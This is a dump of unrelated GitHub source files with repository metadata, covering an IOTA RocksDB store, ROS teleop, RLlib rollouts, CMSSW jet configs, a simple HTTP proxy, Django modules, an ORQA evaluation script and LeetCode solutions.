db_column = self.column_family_python_mapping.get(column, column)
ch = self.db.column_family_handles.get(bytes(db_column, 'ascii'))
if ch is None:
raise KeyError('Invalid column family name: %s' % (column))
return ch
def _convert_key_column(self, key, column):
# Convert column to column family handler
ch = self._convert_column_to_handler(column)
# Expand iota.Tag to iota.Hash
if column == 'tag':
if not isinstance(key, iota.Tag):
raise TypeError('Tag key type should be iota.Tag')
key = iota.Hash(str(key))
# Convert key into trits-binary
if column == 'milestone':
if not isinstance(key, int):
raise TypeError('Milestone key type should be int')
key = struct.pack('>l', key)
else:
if not isinstance(key, iota.TryteString):
raise TypeError('Key type should be iota.TryteString')
if len(key) != iota.Hash.LEN:
raise ValueError('Key length must be 81 trytes')
key = converter.from_trits_to_binary(key.as_trits())
return key, ch
def _get(self, key, bytes_, column):
# Convert value (bytes_) into data object
obj = getattr(iotapy.storage.providers.types, column).get(bytes_, key)
# Handle metadata
if obj and key and column == 'transaction':
obj.set_metadata(self.get(key, 'transaction_metadata'))
return obj
def _get_key(self, bytes_, column):
return getattr(iotapy.storage.providers.types, column).get_key(bytes_)
def _save(self, value, column):
# Convert value to bytes
return getattr(iotapy.storage.providers.types, column).save(value)
def get(self, key, column):
k, ch = self._convert_key_column(key, column)
# Get binary data from database
bytes_ = self.db.get(k, ch)
return self._get(key, bytes_, column)
def next(self, key, column):
key, ch = self._convert_key_column(key, column)
it = self.db.iteritems(ch)
it.seek(key)
next(it)
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def first(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_first()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def latest(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_last()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def may_exist(self, key, column, fetch=False):
key, ch = self._convert_key_column(key, column)
# XXX: Not working......
return self.db.key_may_exist(key, ch)[0]
def save(self, key, value, column):
key, ch = self._convert_key_column(key, column)
value = self._save(value, column)
self.db.put(key, value, ch)
def store(self, key, value, column):
# Store is different then save, currently deailing with transaction
# that transaction will save more data to other column
batches = getattr(iotapy.storage.providers.types, column).store(key, value)
write_batch = rocksdb_iota.WriteBatch()
for k, v, column in batches:
k, ch = self._convert_key_column(k, column)
v = self._save(v, column)
if column in MERGED:
write_batch.merge(k, v, ch)
else:
write_batch.put(k, v, ch)
self.db.write(write_batch)
|
[
"[email protected]"
] | |
710f90e901aebc0be4d31eed525c04c01665c3e0
|
3ad6d731c994813a10801829c45f56c58ff9021d
|
/src/teleop_bot/src/keys_to_twist_with_ramps.py
|
f8bf0f492753a4cd8e20f5fa2477366b8f82f090
|
[] |
no_license
|
bladesaber/ROS_tutorial
|
9b4ae5a9a1bd773ae48d836a87d08bde8a757a5d
|
63486048786ebc864bc731eb1b524a72e9267738
|
refs/heads/master
| 2022-11-16T07:36:15.938433 | 2020-07-07T02:47:50 | 2020-07-07T02:47:50 | 277,693,692 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,584 |
py
|
#!/usr/bin/env python
import rospy
import math
from std_msgs.msg import String
from geometry_msgs.msg import Twist
key_mapping = { 'w': [ 0, 1], 'x': [ 0, -1],
'a': [ 1, 0], 'd': [-1, 0],
's': [ 0, 0] }
g_twist_pub = None
g_target_twist = None
g_last_twist = None
g_last_send_time = None
g_vel_scales = [0.1, 0.1] # default to very slow
g_vel_ramps = [1, 1] # units: meters per second^2
def ramped_vel(v_prev, v_target, t_prev, t_now, ramp_rate):
# compute maximum velocity step
step = ramp_rate * (t_now - t_prev).to_sec()
sign = 1.0 if (v_target > v_prev) else -1.0
error = math.fabs(v_target - v_prev)
if error < step: # we can get there within this timestep. we're done.
return v_target
else:
return v_prev + sign * step # take a step towards the target
def ramped_twist(prev, target, t_prev, t_now, ramps):
tw = Twist()
tw.angular.z = ramped_vel(prev.angular.z, target.angular.z, t_prev,
t_now, ramps[0])
tw.linear.x = ramped_vel(prev.linear.x, target.linear.x, t_prev,
t_now, ramps[1])
return tw
def send_twist():
global g_last_twist_send_time, g_target_twist, g_last_twist,\
g_vel_scales, g_vel_ramps, g_twist_pub
t_now = rospy.Time.now()
g_last_twist = ramped_twist(g_last_twist, g_target_twist,
g_last_twist_send_time, t_now, g_vel_ramps)
g_last_twist_send_time = t_now
g_twist_pub.publish(g_last_twist)
def keys_cb(msg):
global g_target_twist, g_last_twist, g_vel_scales
if len(msg.data) == 0 or not key_mapping.has_key(msg.data[0]):
return # unknown key.
vels = key_mapping[msg.data[0]]
g_target_twist.angular.z = vels[0] * g_vel_scales[0]
g_target_twist.linear.x = vels[1] * g_vel_scales[1]
def fetch_param(name, default):
if rospy.has_param(name):
return rospy.get_param(name)
else:
print "parameter [%s] not defined. Defaulting to %.3f" % (name, default)
return default
if __name__ == '__main__':
rospy.init_node('keys_to_twist')
g_last_twist_send_time = rospy.Time.now()
g_twist_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
rospy.Subscriber('keys', String, keys_cb)
g_target_twist = Twist() # initializes to zero
g_last_twist = Twist()
g_vel_scales[0] = fetch_param('~angular_scale', 0.1)
g_vel_scales[1] = fetch_param('~linear_scale', 0.1)
g_vel_ramps[0] = fetch_param('~angular_accel', 1.0)
g_vel_ramps[1] = fetch_param('~linear_accel', 1.0)
rate = rospy.Rate(20)
while not rospy.is_shutdown():
send_twist()
rate.sleep()
|
[
"[email protected]"
] | |
73fe66859a65e73496b91d800a11f82a54258308
|
a85419f08198548eb6ba4d3df0d181769f810358
|
/C_Carray/split_for_singlechannel_tests.py
|
4887feeda442f244c49cc385774a1b017c5a6ddf
|
[] |
no_license
|
keflavich/w51evlareductionscripts
|
cd0287d750d938bab96f1a7d335b3b84c27a987f
|
00cb8085e8fe5c047f53852c8057a1f7457863f6
|
refs/heads/master
| 2021-01-17T07:26:01.574220 | 2016-07-07T09:02:26 | 2016-07-07T09:02:26 | 8,590,805 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 650 |
py
|
# June 29, 2015
# Instead, use h2co_cvel_split in ../C_AC
# outputvis_A = 'h2co11_Cband_Aarray_nocal_20to100kms.ms'
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_20kms_onechan.ms',
# spw='0:0', width=1)
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_57kms_onechan.ms',
# spw='0:74', width=1)
# outputvis_C = 'h2co11_Cband_Carray_nocal_20to100kms.ms'
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_20kms_onechan.ms',
# spw='0:0', width=1, datacolumn='data')
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_57kms_onechan.ms',
# spw='0:74', width=1, datacolumn='data')
|
[
"[email protected]"
] | |
2e5daa13e1b08a262d40a179079d7d11029e9af2
|
5a0d6fff86846117420a776e19ca79649d1748e1
|
/rllib_exercises/serving/do_rollouts.py
|
d2dff98d01aa7e23c66a2e98eb958ee472389934
|
[] |
no_license
|
ray-project/tutorial
|
d823bafa579fca7eeb3050b0a13c01a542b6994e
|
08f4f01fc3e918c997c971f7b2421551f054c851
|
refs/heads/master
| 2023-08-29T08:46:38.473513 | 2022-03-21T20:43:22 | 2022-03-21T20:43:22 | 89,322,668 | 838 | 247 | null | 2022-03-21T20:43:22 | 2017-04-25T05:55:26 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,596 |
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import argparse
import gym
from ray.rllib.utils.policy_client import PolicyClient
parser = argparse.ArgumentParser()
parser.add_argument(
"--no-train", action="store_true", help="Whether to disable training.")
parser.add_argument(
"--off-policy",
action="store_true",
help="Whether to take random instead of on-policy actions.")
if __name__ == "__main__":
args = parser.parse_args()
import pong_py
env = pong_py.PongJSEnv()
client = PolicyClient("http://localhost:8900")
eid = client.start_episode(training_enabled=not args.no_train)
obs = env.reset()
rewards = 0
episode = []
f = open("out.txt", "w")
while True:
if args.off_policy:
action = env.action_space.sample()
client.log_action(eid, obs, action)
else:
action = client.get_action(eid, obs)
next_obs, reward, done, info = env.step(action)
episode.append({
"obs": obs.tolist(),
"action": float(action),
"reward": reward,
})
obs = next_obs
rewards += reward
client.log_returns(eid, reward, info=info)
if done:
print("Total reward:", rewards)
f.write(json.dumps(episode))
f.write("\n")
f.flush()
rewards = 0
client.end_episode(eid, obs)
obs = env.reset()
eid = client.start_episode(training_enabled=not args.no_train)
|
[
"[email protected]"
] | |
15701489ab41edd41261b2b31779b163a468529e
|
44a2741832c8ca67c8e42c17a82dbe23a283428d
|
/cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/akVs3CaloJetSequence_pPb_mix_cff.py
|
3d77c27baa5beb48450caf86750981f27c601170
|
[] |
no_license
|
yenjie/HIGenerator
|
9ff00b3f98b245f375fbd1b565560fba50749344
|
28622c10395af795b2b5b1fecf42e9f6d4e26f2a
|
refs/heads/master
| 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,519 |
py
|
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
akVs3Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("ak3HiGenJetsCleaned")
)
akVs3Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
akVs3Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akVs3CaloJets"),
payload = "AKVs3Calo_HI"
)
akVs3CalopatJets = patJets.clone(jetSource = cms.InputTag("akVs3CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akVs3Calocorr")),
genJetMatch = cms.InputTag("akVs3Calomatch"),
genPartonMatch = cms.InputTag("akVs3Caloparton"),
jetIDMap = cms.InputTag("akVs3CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
akVs3CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akVs3CalopatJets"),
genjetTag = 'ak3HiGenJetsCleaned',
rParam = 0.3,
matchJets = cms.untracked.bool(True),
matchTag = 'akPu3CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
akVs3CaloJetSequence_mc = cms.Sequence(
akVs3Calomatch
*
akVs3Caloparton
*
akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_data = cms.Sequence(akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_jec = akVs3CaloJetSequence_mc
akVs3CaloJetSequence_mix = akVs3CaloJetSequence_mc
akVs3CaloJetSequence = cms.Sequence(akVs3CaloJetSequence_mix)
|
[
"[email protected]"
] | |
8f8199b6e1f6dfc54c783f31a9ee7c30b7a68a8b
|
86c082438a001ba48617aa756439b34423387b40
|
/src/the_tale/the_tale/accounts/jinjaglobals.py
|
a2404ff781af031fd621d00f6e3091150a03094c
|
[
"BSD-3-Clause"
] |
permissive
|
lustfullyCake/the-tale
|
a6c02e01ac9c72a48759716dcbff42da07a154ab
|
128885ade38c392535f714e0a82fb5a96e760f6d
|
refs/heads/master
| 2020-03-27T21:50:56.668093 | 2018-06-10T17:39:48 | 2018-06-10T17:39:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,295 |
py
|
# coding: utf-8
from dext.common.utils import jinja2
from the_tale.accounts import logic
from the_tale.accounts import conf
@jinja2.jinjaglobal
def login_page_url(next_url='/'):
return jinja2.Markup(logic.login_page_url(next_url))
@jinja2.jinjaglobal
def login_url(next_url='/'):
return jinja2.Markup(logic.login_url(next_url))
@jinja2.jinjaglobal
def logout_url():
return jinja2.Markup(logic.logout_url())
@jinja2.jinjaglobal
def forum_complaint_theme():
return conf.accounts_settings.FORUM_COMPLAINT_THEME
@jinja2.jinjaglobal
def account_sidebar(user_account, page_account, page_caption, page_type, can_moderate=False):
from the_tale.forum.models import Thread
from the_tale.game.bills.prototypes import BillPrototype
from the_tale.linguistics.prototypes import ContributionPrototype
from the_tale.linguistics.relations import CONTRIBUTION_TYPE
from the_tale.accounts.friends.prototypes import FriendshipPrototype
from the_tale.accounts.clans.logic import ClanInfo
from the_tale.blogs.models import Post as BlogPost, POST_STATE as BLOG_POST_STATE
bills_count = BillPrototype.accepted_bills_count(page_account.id)
threads_count = Thread.objects.filter(author=page_account._model).count()
threads_with_posts = Thread.objects.filter(post__author=page_account._model).distinct().count()
templates_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.TEMPLATE).count()
words_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.WORD).count()
folclor_posts_count = BlogPost.objects.filter(author=page_account._model, state=BLOG_POST_STATE.ACCEPTED).count()
friendship = FriendshipPrototype.get_for_bidirectional(user_account, page_account)
return jinja2.Markup(jinja2.render('accounts/sidebar.html',
context={'user_account': user_account,
'page_account': page_account,
'page_caption': page_caption,
'master_clan_info': ClanInfo(page_account),
'own_clan_info': ClanInfo(user_account),
'friendship': friendship,
'bills_count': bills_count,
'templates_count': templates_count,
'words_count': words_count,
'folclor_posts_count': folclor_posts_count,
'threads_count': threads_count,
'threads_with_posts': threads_with_posts,
'can_moderate': can_moderate,
'page_type': page_type,
'commission': conf.accounts_settings.MONEY_SEND_COMMISSION}))
|
[
"[email protected]"
] | |
3f0d333958350a92ac434aa6a8017a17d263453d
|
2d929ed82d53e7d70db999753c60816ed00af171
|
/Python/http/http_proxy.py
|
413b48f03f8f201e702d427e39d87f53adca2682
|
[] |
no_license
|
nyannko/socket-example
|
b058e68e8d41a8a9f5b6a29108f7de394751c904
|
934e9791b1ee92f0dd3092bb07541f1e833b4105
|
refs/heads/master
| 2021-09-10T19:19:24.590441 | 2018-03-14T22:13:49 | 2018-03-14T22:13:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,577 |
py
|
# HTTP proxy
from http.server import BaseHTTPRequestHandler, HTTPServer
from urlpath import URL
import socket
import urllib
HOST = "127.0.0.1"
PORT = 8000
# Run `curl -x http://127.0.0.1:8000 http://www.moe.edu.cn' to test proxy
class ProxyHandler(BaseHTTPRequestHandler):
# GET method
def do_GET(self):
# todo add try catch here
url = URL(self.path)
ip = socket.gethostbyname(url.netloc)
port = url.port
if port is None:
port = 80
path = url.path
print("Connected to {} {} {}".format(url ,ip ,port))
# close connection
del self.headers["Proxy-Connection"]
self.headers["Connection"] = "close"
# reconstruct headers
send_data = "GET " + path + " " + self.protocol_version + "\r\n"
header = ""
for k, v in self.headers.items():
header += "{}: {}\r\n".format(k, v)
send_data += header + "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((ip, port))
s.sendall(send_data.encode())
# receive data from remote
received_data = b""
while 1:
data = s.recv(4096)
if not data:
break
received_data += data
s.close()
# send data to client
self.wfile.write(received_data)
def main():
try:
server = HTTPServer((HOST, PORT), ProxyHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
c5ecd02296aa16caffcde786d3ab77fae28405d1
|
28c598bf75f3ab287697c7f0ff1fb13bebb7cf75
|
/build/bdist.win32/winexe/temp/OpenSSL.crypto.py
|
6acfec583072680d7cf8126acf30df4957600e19
|
[] |
no_license
|
keaysma/solinia_depreciated
|
4cb8811df4427261960af375cf749903d0ca6bd1
|
4c265449a5e9ca91f7acf7ac05cd9ff2949214ac
|
refs/heads/master
| 2020-03-25T13:08:33.913231 | 2014-09-12T08:23:26 | 2014-09-12T08:23:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 343 |
py
|
def __load():
import imp, os, sys
try:
dirname = os.path.dirname(__loader__.archive)
except NameError:
dirname = sys.prefix
path = os.path.join(dirname, 'crypto.pyd')
#print "py2exe extension module", __name__, "->", path
mod = imp.load_dynamic(__name__, path)
## mod.frozen = 1
__load()
del __load
|
[
"[email protected]"
] | |
16e0739edad97ed1235596b5089565cd8efa8f70
|
5b314502919bd7e12521ad126752d279912cd33d
|
/prodcons.py
|
d5e07a09cc1bdc3dcf283f36db18ea8f09ee3142
|
[
"Apache-2.0"
] |
permissive
|
xshi0001/base_function
|
68576d484418b4cda8576f729d0b48a90d0258a1
|
77ed58289151084cc20bfc3328d3ca83e6a19366
|
refs/heads/master
| 2020-12-03T02:24:14.694973 | 2017-06-27T10:51:16 | 2017-06-27T10:51:16 | 95,935,169 | 1 | 0 | null | 2017-07-01T01:39:11 | 2017-07-01T01:39:11 | null |
UTF-8
|
Python
| false | false | 1,533 |
py
|
# -*-coding=utf-8
from Queue import Queue
from random import randint
from MyThread import MyThread
from time import sleep
def queue_test(q):
#q=Queue(10);
for i in range(10):
temp = randint(1, 10)
print temp
q.put("number:", temp)
print "size of queue is %d" % q.qsize()
def writeQ(q, i):
print "producter object for Q"
data = randint(1, 10)
#print "data is %d" %data
q.put(i, 1)
print "size now in producter is %d" % q.qsize()
def readQ(q):
print "consumer object for Q"
data = q.get(1)
print data
print "now after consume Q size is %d" % q.qsize()
def writer(q, loop):
for i in range(loop):
writeQ(q, i)
sleep_time = randint(1, 3)
sleep(sleep_time)
def reader(q, loop):
for i in range(loop):
readQ(q)
sleep_time = randint(2, 5)
sleep(sleep_time)
funcs = [writer, reader]
nfuncs = len(funcs)
def area_test(a):
a = a * 10
def main():
'''
a=2
print "a=%d" %a
area_test(a)
print "a now is a= %d" %a
q=Queue(10);
print "main q size %d" %q.qsize()
queue_test(q)
print "after function q size %d" %q.qsize()
'''
threads = []
q = Queue(10)
loop = 10
for i in range(nfuncs):
t = MyThread(funcs[i], (q, loop))
threads.append(t)
for i in range(nfuncs):
threads[i].start()
'''
for i in range(nfuncs):
threads[i].join()
'''
#print "end of main"
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
b4494671f38f7126a6d2398e2a96b7c336e7f55d
|
2a34a824e1a2d3bac7b99edcf19926a477a157a0
|
/src/cr/vision/io/videowriter.py
|
7277eb9220a2e28a1d27d3f2748e3fc3a6ce7fee
|
[
"Apache-2.0"
] |
permissive
|
carnotresearch/cr-vision
|
a7cb07157dbf470ed3fe560ef85d6e5194c660ae
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
refs/heads/master
| 2023-04-10T22:34:34.833043 | 2021-04-25T13:32:14 | 2021-04-25T13:32:14 | 142,256,002 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,323 |
py
|
'''
Wrapper for OpenCV video writer
'''
import cv2
class VideoWriter:
'''Wrapper class for OpenCV video writer'''
def __init__(self, filepath, fourcc='XVID', fps=15, frame_size=(640, 480), is_color=True):
'''Constructor'''
self.filepath = filepath
if isinstance(fourcc, str):
fourcc = cv2.VideoWriter_fourcc(*fourcc)
elif isinstance(fourcc, int):
pass
else:
raise "Invalid fourcc code"
self.stream = cv2.VideoWriter(filepath, fourcc, fps, frame_size)
self.counter = 0
def write(self, frame):
'''Writes a frame to output file'''
self.stream.write(frame)
self.counter += 1
print(self.counter)
def is_open(self):
'''Returns if the stream is open for writing'''
if self.stream is None:
return False
return self.stream.isOpened()
def stop(self):
'''Stop serving more frames'''
if self.stream is None:
# nothing to do
return
self.stream.release()
self.stream = None
def __del__(self):
# Ensure cleanup
self.stop()
def __enter__(self):
return self
def __exit__(self):
self.stop()
def __call__(self, frame):
self.write(frame)
|
[
"[email protected]"
] | |
a618bd2571db03d8262b8233c0af56287cb540db
|
50dcaae873badd727e8416302a88f9c0bff0a438
|
/bookstore/migrations/0002_auto_20170101_0049.py
|
d3e6f7c0947c25e5f8687afb88146674f49c0239
|
[] |
no_license
|
jattoabdul/albaitulilm
|
4ae0dc857509012e8aa5d775cda64305de562251
|
c5586edaed045fec925a6c0bb1be5e220cbd8d15
|
refs/heads/master
| 2021-01-13T00:00:01.397037 | 2017-02-12T23:32:42 | 2017-02-12T23:32:42 | 81,761,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 641 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-31 23:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bookstore', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='book',
options={'ordering': ['title'], 'verbose_name_plural': 'Books'},
),
migrations.AddField(
model_name='author',
name='image',
field=models.ImageField(blank=True, upload_to='authors', verbose_name="Author's Avatar"),
),
]
|
[
"[email protected]"
] | |
fd5c1bace80b13e13c1a052dd0dcd6ce9afea215
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_340/ch4_2020_03_23_19_22_41_022512.py
|
4f38805b970b740b4a241620cdc59197c4c64017
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 174 |
py
|
def idade(x):
x=int(input('digite sua idade'))
return idade
if (idade=<11):
print('crianca')
if (12<=idade<=17):
print('adolescente')
if (idade>=18):
print ('adulto')
|
[
"[email protected]"
] | |
e2db064b4c559a481a1ab0ba635a84b59bd259e2
|
3e19d4f20060e9818ad129a0813ee758eb4b99c6
|
/conftest.py
|
1b0f10a63a7f6eddd9bf25df6187cc5b35adee18
|
[
"MIT"
] |
permissive
|
ReyvanZA/bitfinex_ohlc_import
|
07bf85f4de8b0be3dc6838e188160d2b4963f284
|
6d6d548187c52bcd7e7327f411fab515c83faef1
|
refs/heads/master
| 2020-08-11T14:22:15.832186 | 2019-10-31T17:51:21 | 2019-11-11T11:33:28 | 214,579,369 | 0 | 0 |
MIT
| 2019-11-11T11:33:29 | 2019-10-12T04:48:12 | null |
UTF-8
|
Python
| false | false | 546 |
py
|
import pytest
@pytest.fixture
def symbols_fixture():
# symbols for testing
return [
"btcusd",
"ltcbtc",
"ethusd"
]
def candles_fixture():
return [[
1518272040000,
8791,
8782.1,
8795.8,
8775.8,
20.01209543
],
[
1518271980000,
8768,
8790.7,
8791,
8768,
38.41333393
],
[
1518271920000,
8757.3,
8768,
8770.6396831,
8757.3,
20.92449167
]]
|
[
"[email protected]"
] | |
5790747bf3bb59cf374317ac2044970705d035fb
|
3213373f90f10c60667c26a56d30a9202e1b9ae3
|
/language/orqa/predict/orqa_eval.py
|
1fe260eb6edd190f0e5df545f0ad78f7fc8a06b0
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Mistobaan/language
|
59a481b3ff6a7c7beada2361aef7173fbfd355a4
|
394675a831ae45ea434abb50655e7975c68a7121
|
refs/heads/master
| 2022-11-29T14:10:37.590205 | 2020-08-13T22:28:13 | 2020-08-13T22:31:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,448 |
py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""ORQA evaluation."""
import json
import os
from absl import flags
from language.orqa.models import orqa_model
from language.orqa.utils import eval_utils
import six
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
flags.DEFINE_string("model_dir", None, "Model directory.")
flags.DEFINE_string("dataset_path", None, "Data path.")
def main(_):
  """Run ORQA inference over a JSONL dataset and report exact-match accuracy.

  Reads one JSON example per line from FLAGS.dataset_path (fields:
  "question", "answer"), runs the predictor loaded from FLAGS.model_dir,
  writes one JSON record per example to <model_dir>/predictions.jsonl, and
  logs the final accuracy.
  """
  predictor = orqa_model.get_predictor(FLAGS.model_dir)
  example_count = 0
  correct_count = 0
  predictions_path = os.path.join(FLAGS.model_dir, "predictions.jsonl")
  with tf.io.gfile.GFile(predictions_path, "w") as predictions_file:
    with tf.io.gfile.GFile(FLAGS.dataset_path) as dataset_file:
      for line in dataset_file:
        example = json.loads(line)
        question = example["question"]
        answers = example["answer"]
        predictions = predictor(question)
        # Model output may contain non-UTF8 bytes; drop them rather than fail.
        predicted_answer = six.ensure_text(
            predictions["answer"], errors="ignore")
        is_correct = eval_utils.is_correct(
            answers=[six.ensure_text(a) for a in answers],
            prediction=predicted_answer,
            is_regex=False)
        # One JSON object per line (JSONL) with the full prediction record.
        predictions_file.write(
            json.dumps(
                dict(
                    question=question,
                    prediction=predicted_answer,
                    predicted_context=six.ensure_text(
                        predictions["orig_block"], errors="ignore"),
                    correct=is_correct,
                    answer=answers)))
        predictions_file.write("\n")
        correct_count += int(is_correct)
        example_count += 1
  # NOTE(review): divides by example_count -- an empty dataset raises
  # ZeroDivisionError; confirm inputs are always non-empty.
  tf.logging.info("Accuracy: %.4f (%d/%d)",
                  correct_count/float(example_count),
                  correct_count,
                  example_count)
if __name__ == "__main__":
  # This script targets TF1 graph-mode APIs; disable TF2 behavior first.
  tf.disable_v2_behavior()
  tf.app.run()
|
[
"[email protected]"
] | |
81dbc6da5a67a3c9d1cf4e3e4013b93416329c60
|
aef08a7c30c80d24a1ba5708f316153541b841d9
|
/Leetcode 0071. Simplify Path.py
|
7f9fbb46989a724cd62a68c8396c195fbacddb48
|
[] |
no_license
|
Chaoran-sjsu/leetcode
|
65b8f9ba44c074f415a25989be13ad94505d925f
|
6ff1941ff213a843013100ac7033e2d4f90fbd6a
|
refs/heads/master
| 2023-03-19T02:43:29.022300 | 2020-11-03T02:33:25 | 2020-11-03T02:33:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,539 |
py
|
"""
71. Simplify Path
Given an absolute path for a file (Unix-style), simplify it. Or in other words, convert it to the canonical path.
In a UNIX-style file system, a period . refers to the current directory. Furthermore, a double period .. moves the directory up a level.
Note that the returned canonical path must always begin with a slash /, and there must be only a single slash / between two directory names. The last directory name (if it exists) must not end with a trailing /. Also, the canonical path must be the shortest string representing the absolute path.
Example 1:
Input: "/home/"
Output: "/home"
Explanation: Note that there is no trailing slash after the last directory name.
Example 2:
Input: "/../"
Output: "/"
Explanation: Going one level up from the root directory is a no-op, as the root level is the highest level you can go.
Example 3:
Input: "/home//foo/"
Output: "/home/foo"
Explanation: In the canonical path, multiple consecutive slashes are replaced by a single one.
Example 4:
Input: "/a/./b/../../c/"
Output: "/c"
Example 5:
Input: "/a/../../b/../c//.//"
Output: "/c"
Example 6:
Input: "/a//b////c/d//././/.."
Output: "/a/b/c"
"""
class Solution:
    def simplifyPath(self, path: str) -> str:
        """Return the canonical form of an absolute Unix-style path.

        Empty segments and "." are dropped; ".." pops the previous
        directory (a no-op at the root).
        """
        parts = []
        for token in path.split("/"):
            if token == "..":
                if parts:
                    parts.pop()
            elif token and token != ".":
                parts.append(token)
        return "/" + "/".join(parts)
|
[
"[email protected]"
] | |
f46600e041a9e3fa1eb90c0961f25917ad284329
|
e95fc8c562c050f47ecb6fb2639ce3024271a06d
|
/medium/46.全排列.py
|
60bd223afd3aaf74a76e0693f8cd590cbe521c1d
|
[] |
no_license
|
w940853815/my_leetcode
|
3fb56745b95fbcb4086465ff42ea377c1d9fc764
|
6d39fa76c0def4f1d57840c40ffb360678caa96e
|
refs/heads/master
| 2023-05-25T03:39:32.304242 | 2023-05-22T01:46:43 | 2023-05-22T01:46:43 | 179,017,338 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,032 |
py
|
#
# @lc app=leetcode.cn id=46 lang=python3
#
# [46] 全排列
#
# @lc code=start
from typing import List
"""
result = []
def backtrack(路径, 选择列表):
if 满足结束条件:
result.add(路径)
return
for 选择 in 选择列表:
做选择
backtrack(路径, 选择列表)
撤销选择
"""
class Solution:
    def permute(self, nums: List[int]) -> List[List[int]]:
        """Return every permutation of the distinct integers in nums."""
        permutations = []

        def extend(current):
            # A full-length path is one complete permutation; snapshot it.
            if len(current) == len(nums):
                permutations.append(current[:])
                return
            for value in nums:
                if value in current:
                    continue
                current.append(value)
                extend(current)
                current.pop()

        extend([])
        return permutations
if __name__ == "__main__":
    # Manual smoke test: print all permutations of [1, 2, 3].
    s = Solution()
    res = s.permute([1, 2, 3])
    print(res)
# @lc code=end
|
[
"[email protected]"
] | |
